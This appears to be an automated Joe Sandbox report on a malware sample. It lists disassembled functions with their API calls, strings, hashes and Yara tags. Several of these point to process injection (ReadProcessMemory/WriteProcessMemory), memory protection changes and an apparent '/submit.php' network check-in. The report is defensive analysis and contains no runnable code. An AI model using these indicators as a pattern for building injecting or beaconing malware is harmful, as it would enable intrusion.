Function 03A6CA74 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 268
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03A7473C: malloc.LIBCMT ref: 03A74758

malloc.LIBCMT ref: 03A6CB1E

Part of subcall function 03A7D1C8: _FF_MSGBANNER.LIBCMT ref: 03A7D1F8
Part of subcall function 03A7D1C8: _NMSG_WRITE.LIBCMT ref: 03A7D202
Part of subcall function 03A7D1C8: HeapAlloc.KERNEL32 ref: 03A7D21D
Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D236
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D241
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D24C

Part of subcall function 03A7CA38: malloc.LIBCMT ref: 03A7CA88

Part of subcall function 03A7CA38: realloc.LIBCMT ref: 03A7CA97

Part of subcall function 03A6EFF8: GetLocalTime.KERNEL32 ref: 03A6F017

malloc.LIBCMT ref: 03A6CC10
_snprintf.LIBCMT ref: 03A6CC8E
_snprintf.LIBCMT ref: 03A6CCB6
free.LIBCMT ref: 03A6CE4B

Part of subcall function 03A75220: GetTickCount.KERNEL32 ref: 03A75232
Part of subcall function 03A75220: GetTickCount.KERNEL32 ref: 03A7524A
Part of subcall function 03A75220: GetTickCount.KERNEL32 ref: 03A75768
Part of subcall function 03A75220: GetTickCount.KERNEL32 ref: 03A7577E
Part of subcall function 03A75220: shutdown.WS2_32 ref: 03A7579D
Part of subcall function 03A75220: shutdown.WS2_32 ref: 03A757B2
Part of subcall function 03A75220: closesocket.WS2_32 ref: 03A757BC
Part of subcall function 03A75220: free.LIBCMT ref: 03A757DC
Part of subcall function 03A75220: free.LIBCMT ref: 03A757F1

_snprintf.LIBCMT ref: 03A6CCDD

Part of subcall function 03A7BA2C: Sleep.KERNEL32 ref: 03A7BA6F
Part of subcall function 03A7BA2C: ExitThread.KERNEL32 ref: 03A7BA79

Strings

/submit.php, xrefs: 03A6CCC7, 03A6CDA9

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CountTickmalloc$_snprintffree$_errnoshutdown$AllocExitHeapLocalSleepThreadTime_callnewhclosesocketrealloc
String ID: /submit.php
API String ID: 1707894466-1804779596
Opcode ID: 10656198658d24da70f1d1fe09ccb68bf04666c12815a9cb96f16df0a35652ad
Instruction ID: d0add2c35c15b1292c8c13b84a7cfb316ed661dfeb050a135f7079a5f654ff49
Opcode Fuzzy Hash: 10656198658d24da70f1d1fe09ccb68bf04666c12815a9cb96f16df0a35652ad
Instruction Fuzzy Hash: DA91B0397007808ADB14FB76AE907AE7395FB85794F44402B9E8A8FB54EF38C50AC745

Uniqueness

Uniqueness Score: -1.00%

Function 00401CD7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00401D4E
RegQueryValueExA.KERNELBASE ref: 00401DA0

Strings

ProductName, xrefs: 00401D8F
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00401D39

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: OpenQueryValue
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 4153817207-1787575317
Opcode ID: d6b84bbe69c67187886f7bbb99f78376dfc49b9bdb321d9d47bc57dead5e5231
Instruction ID: 860154e57b4a556fa68540fb052fb0326cd9d65ea4f7fcbe55c67b176845364d
Opcode Fuzzy Hash: d6b84bbe69c67187886f7bbb99f78376dfc49b9bdb321d9d47bc57dead5e5231
Instruction Fuzzy Hash: B521F8B2310A85DDEB308FA6EC447D833A4F748798F544227DA5C5BBA8DB78C645CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00499EA0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 217
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fwrite.MSVCRT ref: 0049A000

Strings

, xrefs: 0049A190
, xrefs: 0049A05D

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: fwrite
String ID: $
API String ID: 3559309478-227171996
Opcode ID: 9a2f0c4d42041825b7b5d6d725d79a37d58e55f8131706f3dce8c7571e6386d5
Instruction ID: 3d8687e81f9ec03bf2918fa0ce827adb9cb6f757ab29a724675fb455e40cd7b0
Opcode Fuzzy Hash: 9a2f0c4d42041825b7b5d6d725d79a37d58e55f8131706f3dce8c7571e6386d5
Instruction Fuzzy Hash: B8814926740A8489CF209F2AD44536E3B21F385F98F588527DF4E0B769CA3CC896D396

Uniqueness

Uniqueness Score: -1.00%

Function 03A6EC4C Relevance: 4.6, APIs: 3, Instructions: 66
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03A6ED50: WSAStartup.WS2_32 ref: 03A6ED6E

WSASocketA.WS2_32 ref: 03A6EC7A
WSAIoctl.WS2_32 ref: 03A6ECC7
closesocket.WS2_32 ref: 03A6ED26

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: IoctlSocketStartupclosesocket
String ID:
API String ID: 365704328-0
Opcode ID: ed3bc8682e04584c078993addf9385ecf90319f8e82490e05fce3f662c482907
Instruction ID: 9888cb731295aa50311720713f9a9a5439d4baded6c984ac945f48392affc523
Opcode Fuzzy Hash: ed3bc8682e04584c078993addf9385ecf90319f8e82490e05fce3f662c482907
Instruction Fuzzy Hash: 9E21B07A70478487D720CF24B684B5AB7A9F3887E4F544626EF9D13B89DB38C5058B00

Uniqueness

Uniqueness Score: -1.00%

Function 0040F430 Relevance: 4.5, APIs: 3, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__iob_func.MSVCRT ref: 0040F43C
__iob_func.MSVCRT ref: 0040F44A
__iob_func.MSVCRT ref: 0040F46A

Part of subcall function 00418730: __iob_func.MSVCRT ref: 00418738
Part of subcall function 00418730: __iob_func.MSVCRT ref: 00418742

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: __iob_func
String ID:
API String ID: 686374508-0
Opcode ID: 5922f3d6488091483e2899cca46aa7d8b70899dc201f9c6c0d74404106895168
Instruction ID: c8f61055c68cc9b311c816a6767f2f006a4d6d6a64c291a9a037db9ad7b22e03
Opcode Fuzzy Hash: 5922f3d6488091483e2899cca46aa7d8b70899dc201f9c6c0d74404106895168
Instruction Fuzzy Hash: 11E04F32B3461043D660F763A8426CE3719AB88B8CFC5517EBE4957752EE2CC986C719

Uniqueness

Uniqueness Score: -1.00%

Function 00401B4A Relevance: 3.1, APIs: 2, Instructions: 81
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00401BD5
VirtualProtect.KERNELBASE ref: 00401C15

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9ca5d48e6eeb1fcbe83f701e7196a1bdc95073c02570d653e7b3dfa7c4098c40
Instruction ID: 77500a2d8dfb46018afaea11c72d2497fedf353ac89137154d2e401dc431cbb4
Opcode Fuzzy Hash: 9ca5d48e6eeb1fcbe83f701e7196a1bdc95073c02570d653e7b3dfa7c4098c40
Instruction Fuzzy Hash: 0041C2A5712A48A9FF80DB6BEC80B5527A2B349F84F804427DE0D97776DE7CC549870C

Uniqueness

Uniqueness Score: -1.00%

Function 004019AC Relevance: 3.1, APIs: 2, Instructions: 56
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?,?,?,?,-00000001,?,00401E56,?,?,?,?,-00000001), ref: 004019F5
WriteProcessMemory.KERNELBASE(?,?,?,?,?,?,?,?,-00000001,?,00401E56,?,?,?,?,-00000001), ref: 00401A8E

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: MemoryProcess$ReadWrite
String ID:
API String ID: 3589323503-0
Opcode ID: 2ddaf7270dbf992582cba00c10d9683acb07b7625eed9118f9ef2b24478c7917
Instruction ID: 98b4dafa2de7c42f3748a1cb600813b75d4a884917fe5a98ad45077086ac620c
Opcode Fuzzy Hash: 2ddaf7270dbf992582cba00c10d9683acb07b7625eed9118f9ef2b24478c7917
Instruction Fuzzy Hash: 7D217C62704B80DCF761C7B5E84478E3B60635978CF58022ACF8C67B69DB6CC20AC354

Uniqueness

Uniqueness Score: -1.00%

Function 0044CD80 Relevance: 1.6, APIs: 1, Instructions: 139
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fwrite.MSVCRT ref: 0044CE58

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: fwrite
String ID:
API String ID: 3559309478-0
Opcode ID: bf827b397071ca4eac83d4b4488383154314aed1e60b258667dfadbaabb31a94
Instruction ID: 09869162c68fa1788921a88471a33046024d852d9fe86e1b427daa10f258236d
Opcode Fuzzy Hash: bf827b397071ca4eac83d4b4488383154314aed1e60b258667dfadbaabb31a94
Instruction Fuzzy Hash: 01410433715A8489D7249B76D444AAE3B64F704BA8F18421BEE69A3798CB38C942C344

Uniqueness

Uniqueness Score: -1.00%

Function 0044D1E0 Relevance: 1.6, APIs: 1, Instructions: 138fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 0044D2B9

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: fwrite
String ID:
API String ID: 3559309478-0
Opcode ID: caef1970214246bdbf3bb5936298c3f042b3a1790ff47a68a9ea3e18c825c7cc
Instruction ID: 5e96c108f45cd36858723ad18171cbe6fe25ac5cf56294af918f8986ccb4cdd3
Opcode Fuzzy Hash: caef1970214246bdbf3bb5936298c3f042b3a1790ff47a68a9ea3e18c825c7cc
Instruction Fuzzy Hash: 7B41F433B14A8489E7258FB6D444BAE3B74F7147E8F04421BEE69A7788CB78C946C744

Uniqueness

Uniqueness Score: -1.00%

Function 00463960 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00463A17

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: fputc
String ID:
API String ID: 1992160199-0
Opcode ID: 635c12d0e3a4d597a380a20923bb65c851ebef9795b86a41825a89d89c4b85a6
Instruction ID: ee8e6708b06718c683f450208faf38b613ba13315d7887c0d3d280d2c379f48e
Opcode Fuzzy Hash: 635c12d0e3a4d597a380a20923bb65c851ebef9795b86a41825a89d89c4b85a6
Instruction Fuzzy Hash: 5D218B66304A8481DE20DF2EE08126D6760FBC8FA8B188623DF8D07761DF39C996DB45

Uniqueness

Uniqueness Score: -1.00%

Function 036779EB Relevance: 1.4, APIs: 1, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 03677B38

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
Instruction ID: d273170c23fe86385844da1c679d947fa10258df632bd0bd7d0e22ccb10db708
Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
Instruction Fuzzy Hash: D5418670618B899FD784EF2CC488A2AB7E1FB98355F44196DF489C7360D774D981CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0049E3D0 Relevance: 1.3, APIs: 1, Instructions: 28stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0049E3E4

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: ae84e8aa8e489a83a8360603c8a66a2b05dc2dbbb654a32393a0e2918efd214e
Instruction ID: 235b83bb334ade430fbfe021f887ff66b8c1cd4153e69f0c649b4219742f9550
Opcode Fuzzy Hash: ae84e8aa8e489a83a8360603c8a66a2b05dc2dbbb654a32393a0e2918efd214e
Instruction Fuzzy Hash: DAE026A2B42228419D09F31F7C860A92612BFCDFD874884398E0C0B712DE3DDCC34340

Uniqueness

Uniqueness Score: -1.00%

Function 004A1890 Relevance: 1.3, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 004A18B1

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 18747be5806e3b805dd46c482635d9e499613130dcfee545e2c076c34a6cd649
Instruction ID: a5515bace71009a0bd1d5cd9c516718cfa94ad5c35deee783db8fe28771b8936
Opcode Fuzzy Hash: 18747be5806e3b805dd46c482635d9e499613130dcfee545e2c076c34a6cd649
Instruction Fuzzy Hash: 6EF0D4B1751B0082E704AB09E99039632A5B757709F54012EDA49473B0EBBE8495E31F

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0048A850 Relevance: 51.9, Strings: 41, Instructions: 606COMMON

Download Yara Rule

Strings

@KJ, xrefs: 0048B805
p3K, xrefs: 0048AAD6
0KJ, xrefs: 0048B4BF
p=K, xrefs: 0048B187
P1K, xrefs: 0048AD97, 0048B894
P K, xrefs: 0048B72D
`1K, xrefs: 0048B4D6
+H, xrefs: 0048A852
PJJ, xrefs: 0048AD06, 0048B86B
`KJ, xrefs: 0048A956
@1K, xrefs: 0048AD80
pKJ, xrefs: 0048B09A
@K, xrefs: 0048B75F
!K, xrefs: 0048AD55
K, xrefs: 0048B472
`LJ, xrefs: 0048B024
<K, xrefs: 0048AA34
KJ, xrefs: 0048AD69
p:K, xrefs: 0048B062, 0048B07A
JJ, xrefs: 0048AFF2
P>K, xrefs: 0048B1B9
`=K, xrefs: 0048B180
@;K, xrefs: 0048B7B8
@5J, xrefs: 0048A86D
@JJ, xrefs: 0048ABE3, 0048B857
:K, xrefs: 0048B7EA
pJJ, xrefs: 0048B45C, 0048B8C3
P;K, xrefs: 0048B7BF
`JJ, xrefs: 0048B335, 0048B8AF
$K, xrefs: 0048B4FF, 0048B71E
` K, xrefs: 0048B734
pLJ, xrefs: 0048B77A
@>K, xrefs: 0048B1B2
@!K, xrefs: 0048B4A4
P!K, xrefs: 0048B4AB
5J, xrefs: 0048A8B5
PKJ, xrefs: 0048B7D3
p1K, xrefs: 0048B4ED, 0048B8E7
3K, xrefs: 0048B35E
0K, xrefs: 0048A973
=K, xrefs: 0048AA66

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: !K$ 5J$ KJ$0KJ$@!K$@1K$@5J$@;K$@>K$@JJ$@KJ$P K$P!K$P1K$P;K$P>K$PJJ$PKJ$` K$`1K$`=K$`JJ$`KJ$`LJ$p1K$p3K$p:K$p=K$pJJ$pKJ$pLJ$ K$$K$+H$0K$3K$:K$<K$=K$@K$JJ
API String ID: 0-2131963691
Opcode ID: 723f4a85dc05f466dace0923c683b3278aa3714e546b8480e6849e494f74aea1
Instruction ID: 17dbdeb3ea0f4c79c2591de90cf53ec708570cf065a6381f5640d8eb2afd094d
Opcode Fuzzy Hash: 723f4a85dc05f466dace0923c683b3278aa3714e546b8480e6849e494f74aea1
Instruction Fuzzy Hash: B992B0F0384B4595FB01DF19FC6934677A0B71674AF50410AEA880B7A1EFBE8259D38B

Uniqueness

Uniqueness Score: -1.00%

Function 03A843D4 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 460COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 03A8442A
_errno.LIBCMT ref: 03A84431
_invalid_parameter_noinfo.LIBCMT ref: 03A8443C

Strings

U, xrefs: 03A8499E

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_invalid_parameter_noinfo
String ID: U
API String ID: 3902385426-4171548499
Opcode ID: b04278913bfdb2d86bd3fcf39d809e6593f3198cef3e5a228a6e35f7ed4bf705
Instruction ID: a8733af130bceff273c5baa440b808d8c03e6a6202979f9d077d2bd187a438e3
Opcode Fuzzy Hash: b04278913bfdb2d86bd3fcf39d809e6593f3198cef3e5a228a6e35f7ed4bf705
Instruction Fuzzy Hash: C6021433314B828ADB20EF2AD4843AEB775F78A794F44011BDA8A87B54DB3DC545CB11

Uniqueness

Uniqueness Score: -1.00%

Function 03A76CB0 Relevance: 46.5, APIs: 22, Strings: 4, Instructions: 1045COMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32 ref: 03A7BCFC
htonl.WS2_32 ref: 03A7BD0B
GetLastError.KERNEL32 ref: 03A7BD29

Strings

x86, xrefs: 03A775B3, 03A7769C
%s%d%d, xrefs: 03A77632
%s%d%d%s%s%d, xrefs: 03A776CC
x64, xrefs: 03A7759E, 03A775AC

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: htonl$ErrorLast
String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
API String ID: 3987040240-1833344708
Opcode ID: d68524a15420e28e89f7ae59b3e64a120402265f83246d642d5de9aedb9eafd5
Instruction ID: 343794df009d4fe20267478640df9380e17bf0e9c5198e7e59e8d786aec2063f
Opcode Fuzzy Hash: d68524a15420e28e89f7ae59b3e64a120402265f83246d642d5de9aedb9eafd5
Instruction Fuzzy Hash: 70724B25B15B40C6DB28DB269CD0779A3E5F78ABC0F88412BDD4E87B58EE39C642C741

Uniqueness

Uniqueness Score: -1.00%

Function 03A80E90 Relevance: 37.4, APIs: 19, Strings: 2, Instructions: 694COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03A80EF1

Part of subcall function 03A7F454: _getptd.LIBCMT ref: 03A7F46A
Part of subcall function 03A7F454: __updatetlocinfo.LIBCMT ref: 03A7F49F
Part of subcall function 03A7F454: __updatetmbcinfo.LIBCMT ref: 03A7F4C6

_errno.LIBCMT ref: 03A80EF6

Part of subcall function 03A7FBCC: _getptd_noexit.LIBCMT ref: 03A7FBD0

_fileno.LIBCMT ref: 03A80F23

Part of subcall function 03A83914: _errno.LIBCMT ref: 03A8391D
Part of subcall function 03A83914: _invalid_parameter_noinfo.LIBCMT ref: 03A83928

write_multi_char.LIBCMT ref: 03A8155F
write_string.LIBCMT ref: 03A8157C
write_multi_char.LIBCMT ref: 03A81599
